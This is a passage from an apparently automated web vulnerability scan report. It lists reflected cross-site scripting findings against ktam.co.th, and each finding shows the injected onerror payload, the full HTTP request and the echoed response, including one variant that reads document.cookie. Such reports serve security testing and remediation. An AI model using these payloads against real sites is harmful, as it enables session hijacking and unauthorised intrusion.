User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:59 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29522

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/empty.gifdf065\"><img src=a onerror=alert(1)>1a8c6c1b882" title="THAI">
...[SNIP]...

5.108. http://www.ktam.co.th/en/index.php/ims/h_download1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/h_download1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bf25"><img%20src%3da%20onerror%3dalert(1)>61e664de751 was submitted in the REST URL parameter 4. This input was echoed as 4bf25\"><img src=a onerror=alert(1)>61e664de751 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/h_download1.gif4bf25"><img%20src%3da%20onerror%3dalert(1)>61e664de751 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:19 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29528

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/h_download1.gif4bf25\"><img src=a onerror=alert(1)>61e664de751" title="THAI">
...[SNIP]...

5.109. http://www.ktam.co.th/en/index.php/ims/h_link1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/h_link1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4d4a"><img%20src%3da%20onerror%3dalert(1)>db91496aa12 was submitted in the REST URL parameter 4. This input was echoed as c4d4a\"><img src=a onerror=alert(1)>db91496aa12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/h_link1.gifc4d4a"><img%20src%3da%20onerror%3dalert(1)>db91496aa12 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/h_link1.gifc4d4a\"><img src=a onerror=alert(1)>db91496aa12" title="THAI">
...[SNIP]...

5.110. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_acrobat.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a57b"><img%20src%3da%20onerror%3dalert(1)>77670ba0cf0 was submitted in the REST URL parameter 4. This input was echoed as 1a57b\"><img src=a onerror=alert(1)>77670ba0cf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/i_acrobat.gif1a57b"><img%20src%3da%20onerror%3dalert(1)>77670ba0cf0 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:12 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/i_acrobat.gif1a57b\"><img src=a onerror=alert(1)>77670ba0cf0" title="THAI">
...[SNIP]...

5.111. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_firefox.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b98"><img%20src%3da%20onerror%3dalert(1)>a7a6cb10988 was submitted in the REST URL parameter 4. This input was echoed as b4b98\"><img src=a onerror=alert(1)>a7a6cb10988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/i_firefox.gifb4b98"><img%20src%3da%20onerror%3dalert(1)>a7a6cb10988 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:11 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/i_firefox.gifb4b98\"><img src=a onerror=alert(1)>a7a6cb10988" title="THAI">
...[SNIP]...

5.112. http://www.ktam.co.th/en/index.php/ims/i_flash.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_flash.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94a4a"><img%20src%3da%20onerror%3dalert(1)>6c583bc2de1 was submitted in the REST URL parameter 4. This input was echoed as 94a4a\"><img src=a onerror=alert(1)>6c583bc2de1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/i_flash.gif94a4a"><img%20src%3da%20onerror%3dalert(1)>6c583bc2de1 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:09 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/i_flash.gif94a4a\"><img src=a onerror=alert(1)>6c583bc2de1" title="THAI">
...[SNIP]...

5.113. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_winmedia.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a517c"><img%20src%3da%20onerror%3dalert(1)>d04b46e3f13 was submitted in the REST URL parameter 4. This input was echoed as a517c\"><img src=a onerror=alert(1)>d04b46e3f13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/i_winmedia.gifa517c"><img%20src%3da%20onerror%3dalert(1)>d04b46e3f13 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:14 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29527

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/i_winmedia.gifa517c\"><img src=a onerror=alert(1)>d04b46e3f13" title="THAI">
...[SNIP]...

5.114. http://www.ktam.co.th/en/index.php/ims/mails.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/mails.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880fe"><img%20src%3da%20onerror%3dalert(1)>2e1ef035bf was submitted in the REST URL parameter 4. This input was echoed as 880fe\"><img src=a onerror=alert(1)>2e1ef035bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/mails.png880fe"><img%20src%3da%20onerror%3dalert(1)>2e1ef035bf HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29521

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/mails.png880fe\"><img src=a onerror=alert(1)>2e1ef035bf" title="THAI">
...[SNIP]...

5.115. http://www.ktam.co.th/en/index.php/ims/news.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/news.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26408"><img%20src%3da%20onerror%3dalert(1)>6c8f14845c9 was submitted in the REST URL parameter 4. This input was echoed as 26408\"><img src=a onerror=alert(1)>6c8f14845c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/news.php26408"><img%20src%3da%20onerror%3dalert(1)>6c8f14845c9 HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:26 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29519

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/news.php26408\"><img src=a onerror=alert(1)>6c8f14845c9" title="THAI">
...[SNIP]...

5.116. http://www.ktam.co.th/en/index.php/ims/news.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89124"><img%20src%3da%20onerror%3dalert(1)>9b35450f06c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89124\"><img src=a onerror=alert(1)>9b35450f06c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/news.php/89124"><img%20src%3da%20onerror%3dalert(1)>9b35450f06c HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29511

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/89124\"><img src=a onerror=alert(1)>9b35450f06c" title="THAI">
...[SNIP]...

5.117. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_flag_th.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6186"><img%20src%3da%20onerror%3dalert(1)>ca64bcab867 was submitted in the REST URL parameter 4. This input was echoed as f6186\"><img src=a onerror=alert(1)>ca64bcab867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_flag_th.giff6186"><img%20src%3da%20onerror%3dalert(1)>ca64bcab867 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_flag_th.giff6186\"><img src=a onerror=alert(1)>ca64bcab867" title="THAI">
...[SNIP]...

5.118. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_ktamnew.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29cc6"><img%20src%3da%20onerror%3dalert(1)>3381147be69 was submitted in the REST URL parameter 4. This input was echoed as 29cc6\"><img src=a onerror=alert(1)>3381147be69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_ktamnew.gif29cc6"><img%20src%3da%20onerror%3dalert(1)>3381147be69 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:04 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_ktamnew.gif29cc6\"><img src=a onerror=alert(1)>3381147be69" title="THAI">
...[SNIP]...

5.119. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_ktamonline.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b64d"><img%20src%3da%20onerror%3dalert(1)>b6ce0f48117 was submitted in the REST URL parameter 4. This input was echoed as 4b64d\"><img src=a onerror=alert(1)>b6ce0f48117 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_ktamonline.gif4b64d"><img%20src%3da%20onerror%3dalert(1)>b6ce0f48117 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:07 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29529

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_ktamonline.gif4b64d\"><img src=a onerror=alert(1)>b6ce0f48117" title="THAI">
...[SNIP]...

5.120. http://www.ktam.co.th/en/index.php/ims/p_line001.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_line001.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63aa2"><img%20src%3da%20onerror%3dalert(1)>b83b3ad0258 was submitted in the REST URL parameter 4. This input was echoed as 63aa2\"><img src=a onerror=alert(1)>b83b3ad0258 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_line001.gif63aa2"><img%20src%3da%20onerror%3dalert(1)>b83b3ad0258 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:23 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
